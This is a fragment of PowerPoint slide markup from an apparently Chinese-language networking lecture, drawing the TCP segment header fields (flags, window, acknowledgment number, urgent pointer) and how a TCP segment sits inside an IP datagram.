          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4629150" y="3100388"/>
            <a:ext cx="0" cy="9159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5" name="Rectangle 125"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5545138" y="3649663"/>
            <a:ext cx="1508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紧   急   指   针</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79896" name="Rectangle 126"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="3168650"/>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窗   口</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79897" name="Rectangle 127"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4013200" y="2728913"/>
            <a:ext cx="12969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确    认    号</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79898" name="Line 128"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2065338" y="3100388"/>
            <a:ext cx="0" cy="4635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79899" name="Line 129"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3773488" y="3095625"/>
            <a:ext cx="0" cy="4572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0" name="Line 130"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3335338" y="3100388"/>
            <a:ext cx="0" cy="4635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1" name="Line 131"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3552825"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2" name="Line 132"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4198938"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3" name="Line 133"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3986213"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4" name="Line 134"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4416425"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5" name="Rectangle 135"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2332038" y="3178175"/>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保   留</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79906" name="Rectangle 136"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="439102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solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79907" name="Line 137"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1228725" y="1082675"/>
            <a:ext cx="679450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8" name="Rectangle 138"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4292600" y="922338"/>
            <a:ext cx="727075" cy="363537"/>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32 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>位</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79909" name="Line 139"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1214438" y="1590675"/>
            <a:ext cx="680085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0" name="Line 140"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1214438"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1" name="Line 141"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="14271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2" name="Line 142"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="16398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Line 143"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="18526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4" name="Line 144"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="20653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5" name="Line 145"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="22780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6" name="Line 146"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="24892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Line 147"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="27019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8" name="Line 148"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2914650"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9" name="Line 149"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="31273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0" name="Line 150"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="33401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1" name="Line 151"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="35528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2" name="Line 152"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="37655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3" name="Line 153"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="39782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4" name="Line 154"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="41894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5" name="Line 155"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="44021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6" name="Line 156"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4614863"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7" name="Line 157"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="48275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8" name="Line 158"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="50403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9" name="Line 159"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="52530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0" name="Line 160"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="54657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1" name="Line 161"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="56784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2" name="Line 162"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="58896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3" name="Line 163"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="61023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4" name="Line 164"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6315075"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5" name="Line 165"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="65278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6" name="Line 166"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="67405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7" name="Line 167"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="69532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8" name="Line 168"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="71659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9" name="Line 169"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="73787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0" name="Line 170"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="75898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1" name="Line 171"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="78025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2" name="Line 172"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8015288"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3" name="Rectangle 173"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1355725"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4" name="Rectangle 174"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3055938"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5" name="Rectangle 175"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4756150"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6" name="Rectangle 176"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6456363"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7" name="Rectangle 177"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="418941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Y</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79948" name="Rectangle 178"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="397827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R</a:t>
            </a:r>
          </a:p>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T</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79949" name="Rectangle 179"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="375126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P</a:t>
            </a:r>
          </a:p>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H</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79950" name="Rectangle 180"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3538538"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A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79951" name="Rectangle 181"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3306763" y="3113088"/>
            <a:ext cx="3000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U</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79952" name="Rectangle 182"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="885825" y="1204913"/>
            <a:ext cx="7286625" cy="33337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79953" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6313488" y="4033838"/>
            <a:ext cx="3175" cy="4302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4" name="Rectangle 184"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3924300" y="5241925"/>
            <a:ext cx="4305300" cy="493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5" name="Rectangle 185"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6767513" y="4078288"/>
            <a:ext cx="822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填    充</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79956" name="Rectangle 186"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5310188" y="5297488"/>
            <a:ext cx="1455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600">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>数据部分</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79957" name="Rectangle 187"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2497138" y="5216525"/>
            <a:ext cx="1406525" cy="5064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8" name="Rectangle 188"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2497138" y="5216525"/>
            <a:ext cx="5757862" cy="506413"/>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9" name="Line 189"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3903663" y="5227638"/>
            <a:ext cx="0" cy="495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0" name="Rectangle 190"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2692400" y="5345113"/>
            <a:ext cx="720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1" name="Rectangle 191"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2700338" y="5297488"/>
            <a:ext cx="10493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600">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>首部</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79962" name="Rectangle 192"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="638175" y="5313362"/>
            <a:ext cx="206216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TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>报文段</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79963" name="Rectangle 193"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2484438" y="6164263"/>
            <a:ext cx="5770562" cy="504825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCCFF"/>
          </a:solidFill>
          <a:ln w="1905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4" name="Rectangle 194"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4505325" y="6223000"/>
            <a:ext cx="1374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IP </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>数据部分</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79965" name="Rectangle 195"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1495425" y="6223000"/>
            <a:ext cx="917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IP </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>首部</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79966" name="AutoShape 196"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="2855119" y="5966619"/>
            <a:ext cx="758825" cy="268287"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 70710"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha val="43137"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="1270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7" name="AutoShape 197"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="5799137" y="5967413"/>
            <a:ext cx="758825" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 71131"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="43137"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="1270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8" name="Line 198"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8121650" y="1679575"/>
            <a:ext cx="736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9" name="Line 199"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8121650" y="4016375"/>
            <a:ext cx="736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Line 200"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="690563" y="1704975"/>
            <a:ext cx="4699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1" name="Line 201"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="703263" y="4446588"/>
            <a:ext cx="4699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2" name="Rectangle 202"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="250825" y="5891213"/>
            <a:ext cx="1095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solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>发送在前</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
